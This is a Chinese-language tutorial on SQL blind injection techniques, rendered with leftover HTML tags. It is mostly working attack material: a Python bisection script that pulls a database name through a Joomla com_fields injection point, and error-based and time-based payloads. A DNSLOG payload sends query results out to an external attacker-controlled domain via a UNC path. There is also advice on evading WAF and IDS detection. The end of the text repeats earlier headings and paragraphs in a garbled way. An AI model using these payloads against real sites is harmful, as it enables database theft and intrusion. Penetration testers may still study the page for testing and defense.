SQL盲注测试方法解析与技巧<\/h1>

一、SQL盲注概述<\/h2>
SQL盲注是一种在Web应用程序中利用SQL注入漏洞的技术，与常规SQL注入不同，盲注情况下应用程序不会直接返回数据库错误信息或查询结果，而是通过观察应用程序的不同响应行为来推断数据库信息。<\/p>

二、Boolean-Based盲注（布尔型盲注）<\/h2>

基本原理<\/h3>
通过构造SQL查询，使得应用程序根据查询条件的真假返回不同的响应，从而推断出数据库信息。<\/p>

常用函数<\/h3>

left(x,y)<\/code> - 从x的最左侧开始截取前y位<\/li>
ascii(substr((sql),1,1))=num<\/code> - 从sql语句返回的字符串的第一位开始，截取字符串的一长度，将其转换成ascii编码，然后与num比较<\/li>
ord(mid((sql),1,1))=num<\/code> - ord()与ascii()功能相同<\/li>

regexp '^[a-z]'<\/code> - 使用正则表达式进行匹配<\/li>
<\/ol>
二分法实现<\/h3>
二分法可以显著提高布尔型盲注的效率：<\/p>
# -*- coding:UTF-8 -*-<\/span>
<\/span><\/span>import<\/span> requests
<\/span><\/span>import<\/span> sys
<\/span><\/span>
<\/span><\/span>url =<\/span> 'http:\/\/localhost\/Joomla\/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]='<\/span>
<\/span><\/span>string =<\/span> '0123456789ABCDEFGHIGHLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'<\/span>
<\/span><\/span>flag =<\/span> ''<\/span>
<\/span><\/span>cookies =<\/span> {'9e44025326f96e2d9dc1a2aab2dbe5b1'<\/span>: 'l1p92lf44gi4s7jdf5q73l0bt5'<\/span>}
<\/span><\/span>
<\/span><\/span>i =<\/span> 1<\/span>
<\/span><\/span>while<\/span> i <=<\/span> 7<\/span>:
<\/span><\/span>    left =<\/span> 0<\/span>
<\/span><\/span>    right =<\/span> len(string) -<\/span> 1<\/span>
<\/span><\/span>    mid =<\/span> int((left +<\/span> right) \/<\/span> 2<\/span>)
<\/span><\/span>    
<\/span><\/span>    # 特殊情况处理<\/span>
<\/span><\/span>    if<\/span> (right -<\/span> left) ==<\/span> 1<\/span>:
<\/span><\/span>        payload =<\/span> "(CASE WHEN (ascii(substr((select database()),<\/span>{0}<\/span>,1))><\/span>{1}<\/span>) THEN 1 ELSE (SELECT 1 FROM DUAL UNION SELECT 2 FROM DUAL) END)"<\/span>.<\/span>format(i, str(ord(string[left])))
<\/span><\/span>        poc =<\/span> url +<\/span> payload
<\/span><\/span>        response =<\/span> requests.<\/span>get(poc, cookies=<\/span>cookies, timeout=<\/span>2<\/span>)
<\/span><\/span>        if<\/span> ('安全令牌无效'<\/span>) in<\/span> response.<\/span>text:
<\/span><\/span>            flag =<\/span> flag +<\/span> string[right]
<\/span><\/span>        else<\/span>:
<\/span><\/span>            flag =<\/span> flag +<\/span> string[left]
<\/span><\/span>        break<\/span>
<\/span><\/span>    
<\/span><\/span>    # 二分法主循环<\/span>
<\/span><\/span>    while<\/span> 1<\/span>:
<\/span><\/span>        mid =<\/span> int((left +<\/span> right) \/<\/span> 2<\/span>)
<\/span><\/span>        payload =<\/span> "(CASE WHEN (ascii(substr((select database()),<\/span>{0}<\/span>,1))><\/span>{1}<\/span>) THEN 1 ELSE (SELECT 1 FROM DUAL UNION SELECT 2 FROM DUAL) END)"<\/span>.<\/span>format(i, str(ord(string[mid])))
<\/span><\/span>        poc =<\/span> url +<\/span> payload
<\/span><\/span>        response =<\/span> requests.<\/span>get(poc, cookies=<\/span>cookies, timeout=<\/span>2<\/span>)
<\/span><\/span>        
<\/span><\/span>        if<\/span> ('安全令牌无效'<\/span>) in<\/span> response.<\/span>text:  # 右半部<\/span>
<\/span><\/span>            left =<\/span> mid +<\/span> 1<\/span>
<\/span><\/span>        else<\/span>:  # 左半部<\/span>
<\/span><\/span>            right =<\/span> mid
<\/span><\/span>            
<\/span><\/span>        if<\/span> (left ==<\/span> right):
<\/span><\/span>            flag =<\/span> flag +<\/span> string[left]
<\/span><\/span>            break<\/span>
<\/span><\/span>            
<\/span><\/span>        # 特殊情况处理<\/span>
<\/span><\/span>        if<\/span> (right -<\/span> left) ==<\/span> 1<\/span>:
<\/span><\/span>            payload =<\/span> "(CASE WHEN (ascii(substr((select database()),<\/span>{0}<\/span>,1))><\/span>{1}<\/span>) THEN 1 ELSE (SELECT 1 FROM DUAL UNION SELECT 2 FROM DUAL) END)"<\/span>.<\/span>format(i, str(ord(string[left])))
<\/span><\/span>            poc =<\/span> url +<\/span> payload
<\/span><\/span>            response =<\/span> requests.<\/span>get(poc, cookies=<\/span>cookies, timeout=<\/span>2<\/span>)
<\/span><\/span>            if<\/span> ('安全令牌无效'<\/span>) in<\/span> response.<\/span>text:
<\/span><\/span>                flag =<\/span> flag +<\/span> string[right]
<\/span><\/span>            else<\/span>:
<\/span><\/span>                flag =<\/span> flag +<\/span> string[left]
<\/span><\/span>            break<\/span>
<\/span><\/span>    i +=<\/span> 1<\/span>
<\/span><\/span>print(flag)
<\/span><\/span><\/code><\/pre>优缺点<\/h3>

优点：比遍历穷举快<\/li>
缺点：容易被封IP，速度相对较慢<\/li>
<\/ul>
三、DNSLOG盲注<\/h2>
基本原理<\/h3>
利用DNS查询记录来获取SQL注入结果，通过构造特殊的SQL查询使数据库服务器向攻击者控制的DNS服务器发起查询。<\/p>
必要条件<\/h3>

仅限于Windows环境（需要支持UNC路径）<\/li>
MySQL版本>=5.5.53需要检查secure_file_priv<\/code>全局变量是否为空

如果为NULL，则不可用<\/li>
如果为空，则开启<\/li>
如果为目录，则只能在该目录下操作<\/li>
<\/ul>
<\/li>
<\/ol>
配置检查与修改<\/h3>
-- 查看secure_file_priv设置
<\/span><\/span><\/span><\/span>show<\/span> global<\/span> variables like<\/span> '%secure%'<\/span>;
<\/span><\/span>
<\/span><\/span>-- Windows下修改my.ini
<\/span><\/span><\/span><\/span>[mysqld]
<\/span><\/span>secure_file_priv =<\/span> 
<\/span><\/span>
<\/span><\/span>-- Linux下修改my.cnf
<\/span><\/span><\/span><\/span>[mysqld]
<\/span><\/span>secure_file_priv =<\/span> 
<\/span><\/span><\/code><\/pre>示例Payload<\/h3>
?<\/span>id=<\/span>1<\/span>' and if((select load_file(concat('<\/span>\\\\<\/span>',(select database()),'<\/span>.karmaof.me\\<\/span>123<\/span>'))),1,1)--+
<\/span><\/span><\/span><\/code><\/pre>UNC路径说明<\/h3>
UNC为网络（主要指局域网）上资源的完整Windows名称，格式：\\servername\sharename<\/code>，其中：<\/p>

servername<\/code>是服务器名<\/li>
sharename<\/code>是共享资源的名称<\/li>
<\/ul>
优缺点<\/h3>

优点：简单快速，不需要像二分法一样繁琐地一个个遍历<\/li>
缺点：局限于Windows环境，MySQL配置要求较高<\/li>
<\/ul>
四、Time-Based盲注（时间型盲注）<\/h2>
常用延时函数<\/h3>

sleep()<\/code> - 使查询暂停指定秒数
select<\/span> sleep(5<\/span>)
<\/span><\/span><\/code><\/pre><\/li>
benchmark()<\/code> - 执行指定次数的表达式
select<\/span> benchmark(1000000<\/span>,sha(1<\/span>))
<\/span><\/span><\/code><\/pre><\/li>
笛卡尔积 - 通过大量计算造成延时
SELECT<\/span> count<\/span>(*<\/span>) FROM<\/span> information_schema.columns A, information_schema.columns B, information_schema.tables C<\/span>;
<\/span><\/span><\/code><\/pre><\/li>
get_lock()<\/code> - 利用锁机制造成延时（需要mysql_pconnect函数连接数据库）
-- session 1
<\/span><\/span><\/span><\/span>select<\/span> get_lock('karma'<\/span>,1<\/span>)
<\/span><\/span>
<\/span><\/span>-- session 2
<\/span><\/span><\/span><\/span>select<\/span> get_lock('karma'<\/span>,10<\/span>)
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
五、Error-Based盲注（报错型盲注）<\/h2>
常用技术<\/h3>

floor()+count()+group by<\/code>（万能报错）
and<\/span>(select<\/span> 1<\/span> from<\/span>(select<\/span> count<\/span>(*<\/span>),concat((select<\/span> (select<\/span> (select<\/span> concat(0<\/span>x7e,version<\/span>(),0<\/span>x7e))) from<\/span> information_schema.tables limit<\/span> 0<\/span>,1<\/span>),floor(rand(0<\/span>)*<\/span>2<\/span>))x from<\/span> information_schema.tables group<\/span> by<\/span> x)a)--+
<\/span><\/span><\/span><\/code><\/pre><\/li>
exp()<\/code> - 利用数值溢出
and<\/span> exp(~<\/span>(select<\/span> *<\/span> from<\/span> (select<\/span> database<\/span>() ) a) );--+
<\/span><\/span><\/span><\/code><\/pre><\/li>
bigint<\/code>溢出（MySQL Version >=5.4.45）
and<\/span> !<\/span>(select<\/span>*<\/span>from<\/span>(select<\/span> user<\/span>())x)-~<\/span>0<\/span>-- -
<\/span><\/span><\/span><\/code><\/pre><\/li>
extractvalue()<\/code>（MySQL Version >=5.1.5）
and<\/span> extractvalue(1<\/span>,concat(0<\/span>x7e,(select<\/span> @@<\/span>version<\/span>),0<\/span>x7e))--+
<\/span><\/span><\/span><\/code><\/pre><\/li>
updatexml()<\/code>（MySQL Version >=5.1.5）
and<\/span> updatexml(1<\/span>,concat(0<\/span>x7e,(select<\/span> @@<\/span>version<\/span>),0<\/span>x7e),1<\/span>)--+
<\/span><\/span><\/span><\/code><\/pre>
最多只能显示32位，超过长度可以配合substr()<\/li>
<\/ul>
<\/li>
name_const()<\/code> - 生成指定名称的列
union<\/span> select<\/span> *<\/span> from<\/span> (select<\/span> NAME_CONST(version<\/span>(),1<\/span>),NAME_CONST(version<\/span>(),1<\/span>))x;--+
<\/span><\/span><\/span><\/code><\/pre><\/li>
<\/ol>
六、CASE WHEN语句详解<\/h2>
语法结构<\/h3>
CASE<\/span> expression 
<\/span><\/span>    WHEN<\/span> condition1 THEN<\/span> result1
<\/span><\/span>    WHEN<\/span> condition2 THEN<\/span> result2
<\/span><\/span>    ...
<\/span><\/span>    WHEN<\/span> conditionN THEN<\/span> resultN
<\/span><\/span>    ELSE<\/span> result<\/span>
<\/span><\/span>END<\/span>
<\/span><\/span><\/code><\/pre>示例用法<\/h3>
-- 简单判断版
<\/span><\/span><\/span><\/span>select<\/span> 
<\/span><\/span>    (case<\/span> when<\/span> users.id =<\/span> 1<\/span> then<\/span> users.username
<\/span><\/span>          when<\/span> users.id =<\/span> 2<\/span> then<\/span> users.username
<\/span><\/span>          else<\/span> 0<\/span> 
<\/span><\/span>    end<\/span>) as<\/span> username2 
<\/span><\/span>from<\/span> users;
<\/span><\/span>
<\/span><\/span>-- 搜索版（when后可接任意判断表达式）
<\/span><\/span><\/span><\/span>select<\/span> 
<\/span><\/span>    (case<\/span> when<\/span> users.id =<\/span> 1<\/span> then<\/span> users.username
<\/span><\/span>          when<\/span> users.id =<\/span> 2<\/span> then<\/span> users.username
<\/span><\/span>          else<\/span> 0<\/span> 
<\/span><\/span>    end<\/span>) as<\/span> username2 
<\/span><\/span>from<\/span> users;
<\/span><\/span><\/code><\/pre>七、实战注意事项<\/h2>

注入点确认：http:\/\/localhost\/Joomla\/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=[payload]<\/code><\/li>
特殊字符处理：注意单双引号的转义问题<\/li>
错误处理：注意应用程序的错误响应机制<\/li>
性能考虑：根据实际情况选择最适合的盲注技术<\/li>
防御规避：注意WAF\/IDS的检测机制，可能需要调整注入方式<\/li>
<\/ol>
八、防御建议<\/h2>

使用参数化查询（Prepared Statements）<\/li>
实施最小权限原则<\/li>
输入验证和过滤<\/li>
错误信息处理<\/li>
使用Web应用防火墙（WAF）<\/li>
定期安全审计和渗透测试<\/li>
<\/ol>
通过掌握这些SQL盲注技术，安全测试人员可以更全面地评估Web应用程序的安全性，发现潜在的安全隐患。<\/p>

SQL盲注测试方法解析与技巧<\/h1>

一、SQL盲注概述<\/h2> SQL盲注是一种在Web应用程序中利用SQL注入漏洞的技术，与常规SQL注入不同，盲注情况下应用程序不会直接返回数据库错误信息或查询结果，而是通过观察应用程序的不同响应行为来推断数据库信息。<\/p>

二、Boolean-Based盲注（布尔型盲注）<\/h2>

基本原理<\/h3> 通过构造SQL查询，使得应用程序根据查询条件的真假返回不同的响应，从而推断出数据库信息。<\/p>

三、DNSLOG盲注<\/h2>

基本原理<\/h3> 利用DNS查询记录来获取SQL注入结果，通过构造特殊的SQL查询使数据库服务器向攻击者控制的DNS服务器发起查询。<\/p>

四、Time-Based盲注（时间型盲注）<\/h2>

五、Error-Based盲注（报错型盲注）<\/h2>

六、CASE WHEN语句详解<\/h2>

一、SQL盲注概述<\/h2>
SQL盲注是一种在Web应用程序中利用SQL注入漏洞的技术，与常规SQL注入不同，盲注情况下应用程序不会直接返回数据库错误信息或查询结果，而是通过观察应用程序的不同响应行为来推断数据库信息。<\/p>

基本原理<\/h3>
通过构造SQL查询，使得应用程序根据查询条件的真假返回不同的响应，从而推断出数据库信息。<\/p>

基本原理<\/h3>
利用DNS查询记录来获取SQL注入结果，通过构造特殊的SQL查询使数据库服务器向攻击者控制的DNS服务器发起查询。<\/p>